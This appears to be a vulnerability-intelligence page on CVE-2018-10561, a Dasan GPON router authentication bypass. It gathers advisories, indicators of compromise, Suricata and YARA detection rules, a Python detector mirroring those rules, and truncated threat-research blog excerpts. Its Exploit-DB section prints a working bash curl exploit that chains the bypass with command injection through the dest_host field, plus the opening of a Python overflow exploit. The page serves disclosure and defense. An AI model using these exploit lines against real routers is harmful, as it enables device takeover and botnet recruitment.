CVE-2018-10561
Published 2018-05-04
Priority: P1 · 97 · critical 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Ransomware
CISA Known Exploited Vulnerability, remediation due 2022-04-21
Exploited in the wild
EPSS: 93.32% (99.8th percentile)
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.
Detection & IOCs (extracted from sources)
- Authentication bypass on Dasan GPON routers is triggered by appending '?images' to any authenticated URL path. Monitor HTTP requests containing '?images' in the URI targeting GPON management interfaces.
- The WICKED bot scans ports 8080, 8443, 80, and 81 via raw socket SYN connections to identify and exploit vulnerable IoT devices. Anomalous SYN scanning across these ports from IoT devices may indicate WICKED bot activity.
- Omni botnet samples were delivered via the GPON vulnerability (CVE-2018-10561) and hosted in a /bins/ directory on 185.246.152.173. Monitor for HTTP GET requests to /bins/ paths on that IP.
- Yowai (Mirai variant) uses a dictionary attack with a specific set of default credentials. Detect brute-force login attempts using these username/password pairs against router Telnet/SSH services.
- The WICKED bot's configuration table is XOR-encrypted with key 0x37, consistent with Mirai variants. Use this key when decrypting captured bot configs for analysis.
- Trend Micro IPS signature 1134610 covers CVE-2018-10561 exploitation. Ensure this signature is active on network security devices monitoring GPON router traffic.
- CVE-2018-10561 (authentication bypass) is a prerequisite for CVE-2018-10562 (command injection/RCE). Exploitation of the RCE requires chaining both vulnerabilities.
CVSS provenance
- NVD (CVSS v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 9.8 CRITICAL
- CISA: 9.8 CRITICAL
CISA
Dasan GPON Routers Command Injection Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Vulnerability: Dasan GPON Routers Command Injection Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10562
Remediation Due Date: 2022-04-21
CISA
Dasan GPON Routers Authentication Bypass Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Vulnerability: Dasan GPON Routers Authentication Bypass Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10561
Remediation Due Date: 2022-04-21
GHSA
GHSA-9f5c-v3c9-rfhg: An issue was discovered on Dasan GPON home routers
ghsa_unreviewed·2022-05-14
CVE-2018-10561 [CRITICAL] CWE-287 GHSA-9f5c-v3c9-rfhg: An issue was discovered on Dasan GPON home routers
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.
VulnCheck
Dasan GPON Routers Authentication Bypass Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-10561; https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.virusbulletin.com/virusbulletin/2019/12/vb2019-paper-absolutely-routed-why-routers-are-new-bul
VulnCheck
Dasan GPON Routers Command Injection Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_02B-3_Herwig_paper.pdf; https://www.trendmicro.com/en_us/research/19/e/new-mirai-variant-uses-multiple-exploits
Suricata
ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
suricata·2019-03-06·CVSS 9.8
CVE-2018-10561 [CRITICAL] ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"?images/"; pcre:"/(?:\/GponForm\/diag_FORM\?images\/|\.html\?images\/)/i"; http.request_body; content:"XWebPageName=diag&diag"; startswith; fast_pattern; reference:url,www.vpnmentor.com/blog/critical-vulnerability-gpon-router/; classtype:attempted-admin; sid:2027063; rev:4; metadata:created_at 2019_03_06, cve CVE_2018_10561, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001;)
Suricata
ET EXPLOIT HackingTrio UA (Hello, World)
suricata·2018-05-11
CVE-2018-10561 ET EXPLOIT HackingTrio UA (Hello, World)
ET EXPLOIT HackingTrio UA (Hello, World)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT HackingTrio UA (Hello, World)"; flow:established,to_server; http.method; content:"POST"; http.user_agent; content:"Hello, World"; fast_pattern; endswith; reference:cve,2018-10561; reference:cve,2018-10562; reference:url,github.com/f3d0x0/GPON; classtype:attempted-admin; sid:2025576; rev:4; metadata:attack_target IoT, created_at 2018_05_11, cve CVE_2018_10561, deployment Perimeter, performance_impact Low, signature_severity Major, tag GPON, updated_at 2020_09_16;)
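As an added example, not taken from the page's sources or the Emerging Threats ruleset, the Python below reproduces the match conditions of the two ET rules above (sid 2027063 and sid 2025576) and runs them over constructed HTTP requests, so a defender can see which request shapes each rule does and does not cover; the host 192.0.2.1, the User-Agent strings and the request bodies are constructed test data.

```python
"""Mirror ET sid 2027063 (GPON auth-bypass POST) and sid 2025576 (HackingTrio
User-Agent) over raw HTTP requests, e.g. ones reassembled from a PCAP."""
from __future__ import annotations

import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: dict = field(default_factory=dict)  # header names lower-cased
    body: str = ""

    @property
    def user_agent(self) -> str:
        return self.headers.get("user-agent", "")


# sid 2027063: POST, "?images/" in the URI, the pcre on the URI (case-insensitive),
# and a request body that starts with "XWebPageName=diag&diag".
GPON_BYPASS_URI_RE = re.compile(r"(?:/GponForm/diag_FORM\?images/|\.html\?images/)", re.IGNORECASE)
GPON_BYPASS_BODY_PREFIX = "XWebPageName=diag&diag"

# sid 2025576: POST whose User-Agent ends with "Hello, World".
HACKINGTRIO_UA_SUFFIX = "Hello, World"


def matches_gpon_bypass(req: HttpRequest) -> bool:
    """Suricata 'content' matches are case-sensitive; only the pcre carries /i."""
    return (req.method == "POST"
            and "?images/" in req.uri
            and GPON_BYPASS_URI_RE.search(req.uri) is not None
            and req.body.startswith(GPON_BYPASS_BODY_PREFIX))


def matches_hackingtrio_ua(req: HttpRequest) -> bool:
    return req.method == "POST" and req.user_agent.endswith(HACKINGTRIO_UA_SUFFIX)


RULES = (
    (2027063, "ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)", matches_gpon_bypass),
    (2025576, "ET EXPLOIT HackingTrio UA (Hello, World)", matches_hackingtrio_ua),
)


def classify(req: HttpRequest) -> list[int]:
    """Return the sids of every rule whose conditions the request satisfies."""
    return [sid for sid, _msg, predicate in RULES if predicate(req)]


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.x request (CRLF line endings) into an HttpRequest."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, uri, headers, body)


# Constructed test traffic (not captured data). Index 0 uses the lower-case
# "diag_Form" spelling seen in the public PoC, which only the /i pcre tolerates.
SAMPLE_REQUESTS = [
    "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 192.0.2.1\r\nUser-Agent: curl/7.64.0\r\n\r\n"
    "XWebPageName=diag&diag_action=ping",                                # sid 2027063
    "POST /login.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\nUser-Agent: Hello, World\r\n\r\nuser=admin",  # sid 2025576
    "POST /menu.html?images/ HTTP/1.1\r\nHost: 192.0.2.1\r\nUser-Agent: Hello, World\r\n\r\n"
    "XWebPageName=diag&diag_action=ping",                                # both sids
    "GET /diag.html?images/ HTTP/1.1\r\nHost: 192.0.2.1\r\nUser-Agent: curl/7.64.0\r\n\r\n",  # GET: no rule
    "POST /GponForm/diag_FORM HTTP/1.1\r\nHost: 192.0.2.1\r\nCookie: session=constructed\r\n\r\n"
    "XWebPageName=diag&diag_action=ping",                                # no "?images/": no rule
]


def scan(raw_requests: list[str]) -> dict[int, list[int]]:
    """Map request index -> sids fired; requests that fire nothing are omitted."""
    hits: dict[int, list[int]] = {}
    for i, raw in enumerate(raw_requests):
        sids = classify(parse_request(raw))
        if sids:
            hits[i] = sids
    return hits


if __name__ == "__main__":
    for i, sids in scan(SAMPLE_REQUESTS).items():
        print(f"request {i}: fired sids {sids}")
```

The GET of the result page (index 3) fires neither rule because both require POST; covering that retrieval needs a separate URI-based rule.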
YARA
Linux_Exploit_CVE_2018_10561_0f246e33
yara·CVSS 9.8
CVE-2018-10561 [CRITICAL] Linux_Exploit_CVE_2018_10561_0f246e33
rule Linux_Exploit_CVE_2018_10561_0f246e33 {
    meta:
        author = "Elastic Security"
        id = "0f246e33-0e98-4778-8a2f-14876d1a0efe"
        fingerprint = "718b66d3d65d31f0908c8f7d7aee8113e9b51cb576cd725bbca1a23d3ccd4d72"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2018-10561"
        reference_sample = "eac08c105495e6fadd8651d2e9e650b6feba601ec78f537b17fb0e73f2973a1c"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { 0B DF 0B 75 87 8C 5C 03 03 7A 4B 7A 95 4A A5 D2 13 6A 6A 5A 5A }
    condition:
        all of them
}
Exploit-DB
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
exploitdb·2019-02-28·CVSS 9.8
CVE-2019-3921 [CRITICAL] Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
---
#!/usr/bin/python3
import argparse
import requests
import urllib.parse
import binascii
import re
def run(target):
""" Execute exploitation """
# We're using CVE-2018-10561 and/or its extension in order to exploit this
# Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this
# issue after successful authentication: "useradmin" permission is enough
#
# IP Spoofing. Perspective option here too
#
# Step 1. Just a request to adjust stack for the exploit to work
#
# POST /GponForm/device_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en
Exploit-DB
GPON Routers - Authentication Bypass / Command Injection
exploitdb·2018-05-03
CVE-2018-10562 GPON Routers - Authentication Bypass / Command Injection
GPON Routers - Authentication Bypass / Command Injection
---
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the output…."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
Sans Isc
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
blogs_sans_isc·2026-06-25
CVE-2016-20017 What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary]
Published: 2026-06-24. Last Updated: 2026-06-25 00:39:08 UTC
by Nicole Phillips, SANS.edu BACS Student (Version: 1)
[This is a Guest Diary by Nicole Phillips, an ISC intern as part of the SANS.edu BACS program]
"I was just sitting here enjoying the company. Plants got a lot to say, if you take the time to listen."
— Eeyore, Winnie the Pooh
Introduction: Listening to the Static
Setting up and contributing to the DShield honeypot project [1] as an ISC intern is a meaningful part of the BACS program at SANS [2]. Over the last several months I've been thrilled to observe real-time SSH/Telnet activity, check every new file hash and TTY log and hunt for unique http requests. That sa
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus, Oct 09, 2025
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022.
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus, 2025/10/09
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Greynoiseio
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
blogs_greynoiseio·2025-05-27
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
Greynoiseio
GreyNoise 2025 Mass Internet Exploitation Report: Attackers Are Moving Faster Than Ever — Are You Ready?
blogs_greynoiseio·2025-02-27
GreyNoise 2025 Mass Internet Exploitation Report: Attackers Are Moving Faster Than Ever — Are You Ready?
Bleepingcomputer
New Aquabotv3 botnet malware targets Mitel command injection flaw
blogs_bleepingcomputer·2025-01-29·CVSS 7.2
CVE-2024-41710 [HIGH] New Aquabotv3 botnet malware targets Mitel command injection flaw
## New Aquabotv3 botnet malware targets Mitel command injection flaw
By Bill Toulas
A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones.
The activity was discovered by Akamai's Security Intelligence and Response Team (SIRT), who reports that this is the third variant of Aquabot that falls under their radar.
The malware family was introduced in 2023, and a second version that added persistence mechanisms was released later. The third variant, 'Aquabotv3,' introduced a system that detects termination signals and sends the info to the command-and-control (C2) server.
Akamai comments that Aquabotv3's mechanism to report back kill attempts is unusual for botnets and may have been
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Network Attack Trends: Internet of Threats (August-October 2020)
By Yue Guan, Lei Xu, Ken Hsu, Zhibin Zhang
Published: January 22, 2021
Tags: Malware, Trend Reports, Vulnerabilities, DDoS, Exploits, IoT, Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-14
Transforming IoT Monitoring Data into Threat Defense
Cyber Threats
## Transforming IoT Monitoring Data into Threat Defense
To protect its customers even better against cyber threats, Trend Micro uses the Indicators of Compromise collected from IoT attacks to improve its threat-detection capability.
By: Shimamura Makoto, Oct 14, 2020
Original article by Shimamura Makoto, Senior Security Specialist
Trend Micro's 2020 midyear security report shows a 70 percent increase in attacks on devices and routers compared with the second half of 2019. This includes attacks on Internet of Things (IoT) systems, whose growing number is alarming. Trend Micro's security researchers monitor the trends in these attacks and examined
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-08
Transforming IoT Monitoring Data into Threat Defense
IoT
# Transforming IoT Monitoring Data into Threat Defense
In this article, we feature data gathered from our continuous monitoring of C&C servers of botnets such as Mirai and Bashlite. We also share how this data is used to bolster the protection of IoT devices.
By: Shimamura Makoto, 2020/10/08
In our midyear roundup report, we shared that in the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared with the second half of 2019. This data includes attacks on Internet of Things (IoT) systems, which remain alarming and prevalent.
With the aim of protecting customers effectively by continuously monitoring trends in IoT attacks, we examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types th
Checkpoint
21st September – Threat Intelligence Bulletin
blogs_checkpoint·2020-09-21
CVE-2020-1472 21st September – Threat Intelligence Bulletin
## 21st September – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 21st September 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Check Point Research has unraveled an ongoing surveillance operation by Iranian entities that have been targeting Iranian expats and dissidents for years. The campaign targets both PCs and mobile devices, and is focused on stealing keys and data from social apps.
Check Point SandBlast Mobile, SandBlast Network
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint·2020-09-15·CVSS 9.8
CVE-2018-10561 [CRITICAL] Rudeminer, Blacksquid and Lucifer Walk Into A Bar
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Trendmicro
Mirai Variants Target Video Surveillance Systems
blogs_trendmicro·2020-02-06·CVSS 9.8
[CRITICAL] Mirai Variants Target Video Surveillance Systems
Vulnerability Exploitation
## Mirai Variants Target Video Surveillance Systems
Trend Micro security researchers have found two variants of the Internet of Things (IoT) malware Mirai. They use new propagation methods and gain access through a vulnerability in video surveillance storage systems.
By: Trend Micro, Feb 06, 2020
By Trend Micro
Trend Micro security researchers have found two variants of the Internet of Things (IoT) malware Mirai. The two variants, SORA (IoT.Linux.MIRAI.DLEU) and UNSTABLE (IoT.Linux.MIRAI.DLEV), use new propagation methods and gain access through the vulnerability CVE-2020-6756 in Rasilient PixelStor5000 video surveillance storage systems.
Mirai is malware that
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
| No. | CVE | Products Affected by CVE | CVSS Score (NVD) | Examples of Threat Actors |
|---|---|---|---|---|
| 1 | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) |
2
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec, Aug 13, 2019
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlis
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
May 23, 2019
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campa
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
2019/01/25
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Fortinet
DDoS-for-Hire Service Powered by Bushido Botnet
blogs_fortinet·2018-10-26
DDoS-for-Hire Service Powered by Bushido Botnet
FORTIGUARD LABS THREAT RESEARCH
DDoS-for-Hire Service Powered by Bushido Botnet
By Rommel Joven and Evgeny Ananin | October 26, 2018
Distributed Denial-of-Service (DDoS) service offerings, often disguised as legitimate “booter” or “stresser” services, continue to increase in the cyber underground market. This relatively new Crime-as-a-Service trend has created an entry point for novice DDoS attackers, offering a simple option to anonymously attack nearly any website and forcing it offline for a small fee.
Sadly, due to the public release of the source code of some popular bots, building a botnet to provide these services is simpler than ever. A quick Google search returns lists of resources for botnet builders, usually with complete step-by-step instructions. Being able to re-use and ev
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
Mikhail Kuzin
Yaroslav Shmelev
Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
- The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
- The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.
All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks cust
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
## Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Ruchna Nigam
Published: July 20, 2018
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring sa
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team
2018/05/21
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE-2
Fortinet
A Wicked Family of Bots
blogs_fortinet·2018-05-17
A Wicked Family of Bots
FORTIGUARD LABS THREAT RESEARCH
A Wicked Family of Bots
By Rommel Joven and Kenny Yang | May 17, 2018
As we continue to keep track of the latest IoT botnets, the FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago. Since then, threat actors have been adding their own flavours to the original recipe.
